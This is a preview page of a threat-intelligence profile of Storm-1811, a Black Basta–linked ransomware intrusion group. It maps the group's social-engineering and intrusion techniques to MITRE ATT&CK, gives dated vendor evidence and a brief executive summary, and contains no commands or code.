3C-INT logo [Cyber]Crime Characterization for Intelligence FREE PREVIEW
You are exploring the Free preview. To unlock full read-only access to all public profiles and in-app notifications, create a free research account. For analyst / premium plans capabilities (editing, advanced tabs, exports), please contact us

Threat Actor Characterization

Back
You’re viewing the read-only version. Sign in for analyst tools (editors, promote draft, file/relations management, etc.)
Storm-1811

Storm-1811

ID: 48b81b9a56420fb7886905f461c80d3557424
Cybercrime Cybercriminal Malware Dev
Threat types: Intrusion, Ransomware
Unknown
Updated: 2026-01-13
Created: 2025-10-22
Progress: 43% Completeness: 40% Freshness: 50%
Operation zone:
Aliases Limited alias preview
No aliases registered.
Actor Network Graph
Open Network Graph
Read-only preview for anonymous visitors. Sign in with a free Research account for full workspace.
MITRE ATT&CK®
confidence: high
Actor Techniques page ATT&CK® Diagram

Storm-1811 — financially motivated intrusions linked to Black Basta ransomware. Hallmarks: email-bombing to create urgency, IT/help-desk impersonation over Microsoft Teams/voice (vishing), abuse of Quick Assist and RMM tools, BITS/cURL ingress, Impacket/PsExec lateral movement, and selective ransomware deployment.


Technique Technique name Tactics Evidence
T1667 Email Bombing TA0040
  • 2024-05-10 — Rapid7 documents mailbox 'email-bombing' used to prompt user contact with fake IT/help desk. · ref
  • 2025-03-14 — MITRE G1046 lists Email Bombing as a technique used by Storm-1811. · ref
T1566.003 Spearphishing via Service TA0001
  • 2024-05-15 — Microsoft observed Storm-1811 using Microsoft Teams at end of May 2024 to message/call targets posing as help desk. · ref
  • 2025-03-14 — MITRE G1046 maps Storm-1811 to Spearphishing via Service (Teams). · ref
T1566.004 Spearphishing Voice TA0001
  • 2024-05-15 — Microsoft and partners detail vishing/voice calls used to drive Quick Assist sessions. · ref
  • 2024-12-02 — Red Canary shows help-desk scam culminating in RMM and Black Basta. · ref
T1656 Impersonation TA0005
  • 2024-05-15 — Impersonation of IT/help desk and spoofed Teams account names to gain trust. · ref
T1219.002 Remote Desktop Software TA0011
  • 2024-05-15 — Abuse of Quick Assist; subsequent use of legitimate remote-support tools (ScreenConnect, NetSupport, AnyDesk). · ref
T1105 Ingress Tool Transfer TA0011
  • 2024-05-10 — BITSAdmin/cURL used to retrieve payloads and scripts post-access. · ref
  • 2025-03-14 — MITRE G1046 lists Ingress Tool Transfer via BITSAdmin/cURL. · ref
T1059.001 PowerShell TA0002
  • 2024-05-10 — PowerShell used extensively for staging, persistence, and configuration changes. · ref
T1036.010 Masquerade Account Name TA0005
  • 2025-03-14 — Masquerade Account Name: IT/help-desk spoofed identities in Teams. · ref
T1074.001 Local Data Staging TA0009
  • 2024-05-10 — Local staging of captured credentials prior to exfiltration. · ref
T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol TA0010
  • 2024-05-10 — Exfiltration via SCP in some incidents. · ref
T1570 Lateral Tool Transfer TA0008
  • 2024-05-10 — Lateral tool transfer with Impacket; PsExec used for remote execution. · ref
T1021.002 SMB/Windows Admin Shares TA0008
  • 2024-05-10 — SMB/Windows Admin Shares leveraged during lateral movement. · ref
T1486 Data Encrypted for Impact TA0040
  • 2024-05-15 — Linkage to Black Basta ransomware deployment post-intrusion. · ref
  • 2025-01-21 — Sophos reports at least one case ending with Black Basta. · ref
T1585.003 Cloud Accounts TA0042
  • 2025-03-14 — Establish Cloud Accounts (malicious Microsoft 365/Teams tenants) to message targets and host payloads. · ref
Strategic Intelligence
Limited preview
Last updated: 2025-10-22T21:56:20+00:00

Storm-1811 - Financially motivated intrusions


Executive Summary

Storm-1811 is a financially motivated intrusion set tracked by Microsoft and MITRE (G1046), frequently linked to Black Basta ransomware deployment. The group’s hallmark is a staged social-engineering playbook: overwhelm a user’s mailbox with non-malicious “email-bombing,” then impersonate internal IT via Microsoft Teams or voice calls to secure remote access (often through Quick Assist) and drop RMM tools, loaders, and post-exploitation frameworks. Public reporting also documents AiTM credential theft (e.g., EvilProxy), BITS jobs for tool transfer, and lateral movement culminating in ransomware execution. Overall technical sophistication is moderate but operationally effective due to strong social-engineering tradecraft and rapid “hands-on-keyboard” follow-through. Confidence: high for TTPs, medium for specific victim geographies and sector concentration (vendor-reported).


  • Motivation: Profit via data theft + encryption (double extortion) in support of, or overlapping with, Black Basta operations.
  • Operating model: Access-brokering and/or direct intrusion team using commodity tools, living-off-the-land, and legitimate collaboration platforms (Teams) as initial-access surfaces.
  • Branding: “Storm-1811” is a Microsoft tracking label; some third-party write-ups equate/overlap Storm-1811 with Black Basta operators or “Cardinal/UNC” designations—these mappings vary by vendor (treat cautiously). INFERENCE (confidence: low).
Full strategic intelligence is available in Analyst and Premium plans.
Executive Analyst Brief for CISO
Empty Limited preview
No content yet.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Executive brief now
Saved successfully.
Hunting Playbook
Empty Limited preview
No content yet.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Hunting Playbook now
Saved successfully.
IOC Appendix
Empty Limited preview
No content yet.
IOC Appendix now
Saved successfully.
OSINT Library
Empty Limited preview
No content yet.
OSINT Library now
Saved successfully.
Social Medial & Communication
SOCMINT integrated: 0/0
No social links registered for this profile.
Notes: preview mode hides sensitive social/contact details.
Reference Images/Associated Evidence Limited
No images found for this threat.